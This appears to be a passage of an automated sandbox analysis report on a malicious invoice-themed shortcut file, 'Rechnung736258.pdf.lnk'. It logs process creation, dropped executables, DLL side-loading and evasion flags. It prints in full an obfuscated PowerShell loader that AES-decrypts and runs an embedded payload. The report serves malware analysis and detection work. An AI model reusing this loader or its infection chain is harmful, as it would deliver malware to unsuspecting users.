                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: Rechnung736258.pdf.lnkLNK file: ..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000003.2666686122.000001C393781000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666568838.000001C3977BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665256230.000001C397868000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666496000.000001C397800000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdbGCTL source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: inetmib1.pdb source: cmd.exe, 00000012.00000002.2564115013.0000000005540000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2840805790.00000000009F6000.00000008.00000001.01000000.00000000.sdmp
                      Source: Binary string: c:\Qt\WebUI2\Release\WebUI.pdb source: TCUINOVJ.exe, 0000000F.00000003.2256610867.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C257000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B906000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.dr
                      Source: Binary string: wntdll.pdb source: iScrPaint.exe, 00000010.00000002.2299837810.0000000008C1C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2303494720.0000000008F70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563431937.0000000004BCD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563913861.0000000005030000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842076242.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2842264902.0000000005170000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000003.2672249767.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665725612.000001C397818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2673015925.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667173351.000001C397822000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2682666558.000001C397750000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2679787349.000001C393774000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667721804.000001C397778000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667474568.000001C393773000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665913555.000001C39376B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2666444250.000001C397820000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: explorer.pdb source: explorer.exe, 00000015.00000003.2562816903.000000000552C000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)Jump to behavior
                      Source: documentcomplie[1].5.drStatic PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,15_2_00406D5D
                      Source: WebUI.dll.16.drStatic PE information: real checksum: 0x7a6eb0 should be: 0x7af0ca
                      Source: WebUI.dll.15.drStatic PE information: real checksum: 0x7a6eb0 should be: 0x7af0ca
                      Source: TCUINOVJ.exe.7.drStatic PE information: real checksum: 0x33302 should be: 0x3f9251
                      Source: documentcomplie[1].5.drStatic PE information: real checksum: 0x1f27b should be: 0x7fe37
                      Source: umffwoglbib.18.drStatic PE information: real checksum: 0x0 should be: 0x556f9
                      Source: documentcomplie[1].5.drStatic PE information: section name: .didat
                      Source: WebUI.dll.15.drStatic PE information: section name: .unwante
                      Source: WebUI.dll.16.drStatic PE information: section name: .unwante
                      Source: umffwoglbib.18.drStatic PE information: section name: kygc
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00411C20 push eax; ret 15_2_00411C4E
                      Source: C:\Users\user\iScrPaint.exeCode function: 16_2_6C086120 push ecx; ret 16_2_6C086133
                      Source: C:\Users\user\iScrPaint.exeCode function: 16_2_6C077B5D push ecx; ret 16_2_6C077B70
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeCode function: 17_2_6B707B5D push ecx; ret 17_2_6B707B70
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311960A push cs; iretd 21_3_03119649
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311F63A push cs; ret 21_3_0311F649
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_03119453 push edi; iretd 21_3_03119481
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311955A push FFFFFFCFh; iretd 21_3_03119569
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311955A push 004D32CFh; iretd 21_3_03119579
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311F540 push es; ret 21_3_0311F609
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311F66A push ss; ret 21_3_0311F689
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_03119483 push ecx; iretd 21_3_031194B1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311968A push ds; iretd 21_3_031196C9
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311F4B4 push eax; ret 21_3_0311F4B9
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_3_0311F6BA push ds; ret 21_3_0311F6C9

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Creates processes via WMI
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\iScrPaint.exeJump to dropped file
                      Source: C:\Users\user\iScrPaint.exeFile created: C:\Users\user\AppData\Roaming\BackupPatch\WebUI.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\WebUI.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\TCUINOVJ.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\umffwoglbibJump to dropped file
                      Source: C:\Users\user\iScrPaint.exeFile created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeJump to dropped file
                      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]Jump to dropped file
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\iScrPaint.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\WebUI.dllJump to dropped file
                      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]Jump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\umffwoglbibJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\iScrPaint.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeFile created: C:\Users\user\WebUI.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Found hidden mapped module (file has been removed from disk)
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\UMFFWOGLBIB
                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: pdf.lnkStatic PE information: Rechnung736258.pdf.lnk
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
